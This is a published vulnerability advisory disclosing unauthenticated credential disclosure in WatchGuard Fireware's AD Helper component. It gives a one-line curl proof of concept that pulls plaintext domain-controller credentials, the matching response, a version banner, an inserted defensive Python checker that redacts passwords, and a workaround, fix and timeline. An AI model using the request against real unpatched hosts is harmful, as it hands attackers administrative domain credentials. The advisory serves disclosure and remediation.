# Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure
# Author: RedTeam Pentesting GmbH
# Date: 2020-03-11
# Vendor: https://www.watchguard.com
# Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
# CVE: N/A

Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component

RedTeam Pentesting discovered a credential-disclosure vulnerability in
the AD Helper component of the WatchGuard Fireware Threat Detection and
Response (TDR) service, which allows unauthenticated attackers to gain
Active Directory credentials for a Windows domain in plaintext.


Details
=======

Product: WatchGuard Fireware AD Helper Component
Affected Versions: 5.8.5.10233, < 5.8.5.10317
Fixed Versions: 5.8.5.10317
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

"Threat Detection and Response (TDR) is a cloud-based subscription
service that integrates with your Firebox to minimize the consequences
of data breaches and penetrations through early detection and automated
remediation of security threats."

"Threat Detection and Response includes the AD Helper component. If your
network has an Active Directory server, you can install AD Helper to
manage automated installation and updates of Host Sensors on your
network."

(from the vendor's homepage)


More Details
============

By accessing the AD Helper's web interface, it was discovered that a
call to an API endpoint is made, which responds with plaintext
credentials to all configured domain controllers. There is no
authentication needed to use the described interface and the
installation instructions at [1] contain no indication of any way to
configure access control.


Proof of Concept
================

An HTTP GET request to the path "/domains/list" of the AD Helper
API returns, among others, the plaintext credentials to
all configured Windows domain controllers:

------------------------------------------------------------------------
$ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .

{
  "content": [
    {
      "id": 1,
      "fullyQualifiedName": "example.com",
      "logonDomain": "example.com",
      "domainControllers": "dc1.example.com",
      "username": "[DOMAIN_USER]",
      "password": "[DOMAIN_PASSWORD]",
      "uuid": "[...]",
      "servers": [
        {
          [...]
        }
      ]
    }
  ],
  "totalPages": 1,
  "totalElements": 1,
  "number": 0,
  "numberOfElements": 1
}
------------------------------------------------------------------------

The same request and its response can be observed when initially accessing
the web interface. The discovered version of AD Helper responds with
the following server banner:

------------------------------------------------------------------------
jetty(winstone-5.8.5.10233-9.4.12.v20180830)
------------------------------------------------------------------------

It is likely that other versions of the AD Helper Component are
vulnerable as well.


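An added offline assessment helper, not code from the advisory or from WatchGuard: it reads a captured Server banner and a captured /rest/domains/list body, decides whether the build is older than the fixed release and reports which domain entries carry credential fields without copying the password values. The sample banner is the one quoted above; the sample body is constructed to follow the shape of the proof of concept.

```python
"""Offline assessment helper for the AD Helper credential-disclosure issue.
Added example, not code from the advisory or from WatchGuard: it works on a
captured Server banner and a captured /rest/domains/list body; samples are
constructed, following the shape shown in the proof of concept."""
import json
import re

FIXED_VERSION = (5, 8, 5, 10317)  # "Fixed Versions" from the advisory
CREDENTIAL_KEYS = ("username", "password")
# Banner format from the advisory: jetty(winstone-<AD Helper version>-<Jetty version>)
BANNER_RE = re.compile(r"winstone-(\d+(?:\.\d+)+)-")


def adhelper_version(server_header):
    """Extract the AD Helper version as an int tuple from the Jetty/Winstone banner."""
    m = BANNER_RE.search(server_header)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def banner_is_vulnerable(server_header):
    """True if the banner reports a build older than the fixed release;
    None when no version can be parsed (unknown is not the same as safe)."""
    version = adhelper_version(server_header)
    return None if version is None else version < FIXED_VERSION


def exposed_credentials(body):
    """Redacted findings for every domain entry carrying credential fields.
    The password value itself is never copied, only whether one is present."""
    findings = []
    for entry in json.loads(body).get("content", []):
        if all(key in entry for key in CREDENTIAL_KEYS):
            findings.append({
                "domain": entry.get("fullyQualifiedName"),
                "username": entry.get("username"),
                "password_present": bool(entry.get("password")),
            })
    return findings


# Constructed samples; the banner string is the one quoted in the advisory.
SAMPLE_BANNER = "jetty(winstone-5.8.5.10233-9.4.12.v20180830)"
SAMPLE_BODY = json.dumps({"content": [{
    "id": 1, "fullyQualifiedName": "example.com", "logonDomain": "example.com",
    "domainControllers": "dc1.example.com", "username": "EXAMPLE\\svc-adhelper",
    "password": "constructed-sample-secret", "uuid": "00000000-0000-0000-0000-000000000000",
    "servers": []}], "totalPages": 1, "totalElements": 1, "number": 0, "numberOfElements": 1})

if __name__ == "__main__":
    print(banner_is_vulnerable(SAMPLE_BANNER), exposed_credentials(SAMPLE_BODY))
```

Feed it the Server header and body saved from a request made during an authorised assessment; a banner it cannot parse yields None rather than a false "not vulnerable".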
Workaround
==========

Ensure that the API of the AD Helper Component is not reachable over
the network, for example by placing it behind a firewall.


Fix
===

Update to Version 5.8.5.10317 or later.


Security Risk
=============

No authentication is needed to access AD Helper's web interface and the
installation instructions at [1] describe that configured domain user
accounts must possess at least the following privileges:

* Connect to the host
* Mount the share ADMIN$
* Create a file on the host
* Execute commands on the host
* Install software on the host

Access to the "ADMIN$" share implies a user with administrative
privileges. Therefore, this vulnerability poses a high risk.


Timeline
========

2020-02-12 Vulnerability identified
2020-02-19 Customer approved disclosure to vendor
2020-02-24 Tried to contact the German branch of WatchGuard
2020-02-27 Contacted the Dutch branch of WatchGuard
2020-02-28 Contact to ADHelper QA Team Lead established
2020-03-02 Advisory draft sent for verification
2020-03-10 Vendor released fixed version and blog post
2020-03-11 CVE ID requested
2020-03-11 Advisory released


References
==========

[1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants
to share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/